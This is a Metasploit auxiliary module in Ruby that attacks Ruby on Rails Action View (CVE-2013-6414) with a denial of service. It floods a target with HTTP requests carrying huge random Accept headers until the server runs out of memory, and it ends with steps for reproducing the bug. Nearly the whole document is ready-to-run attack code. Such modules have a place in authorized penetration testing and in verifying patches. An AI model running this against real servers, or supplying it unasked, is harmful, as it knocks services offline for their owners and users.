Ruby on Rails Action View MIME Memory Exhaustion

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Action View MIME Memory Exhaustion',
      'Description'    => %q{
        This module exploits a Denial of Service (DoS) condition in Action View that requires
        a controller action. By sending a specially crafted content-type header to a Rails
        application, it is possible for it to store the invalid MIME type, and may eventually
        consume all memory if enough invalid MIMEs are given.

        Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
      },
      'Author'         =>
        [
          'Toby Hsieh', # Reported the issue
          'joev',       # Metasploit
          'sinn3r'      # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-6414' ],
          [ 'OSVDB', '100525' ],
          [ 'BID', '64074' ],
          [ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ],
          [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
        ],
      'DisclosureDate' => '2013-12-04'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
        OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
        OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000])
      ],
    self.class)
  end

  def host
    host = datastore['RHOST']
    host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
    host
  end

  def long_string
    Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
  end

  #
  # Returns a modified version of the URI that:
  # 1. Always has a starting slash
  # 2. Removes all the double slashes
  #
  def normalize_uri(*strs)
    new_str = strs * "/"

    new_str = new_str.gsub!("//", "/") while new_str.index("//")

    # Makes sure there's a starting slash
    unless new_str.start_with?("/")
      new_str = '/' + new_str
    end

    new_str
  end

  def http_request
    uri = normalize_uri(datastore['URIPATH'])

    http = ''
    http << "GET #{uri} HTTP/1.1\r\n"
    http << "Host: #{host}\r\n"
    http << "Accept: #{long_string}\r\n"
    http << "\r\n"

    http
  end

  def run
    begin
      print_status("Stressing the target memory, this will take quite some time...")
      datastore['RLIMIT'].times { |i|
        connect
        datastore['REQCOUNT'].times { sock.put(http_request) }
        disconnect
      }

      print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
    ensure
      disconnect
    end
  end
end

=begin

Reproduce:

1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application

=end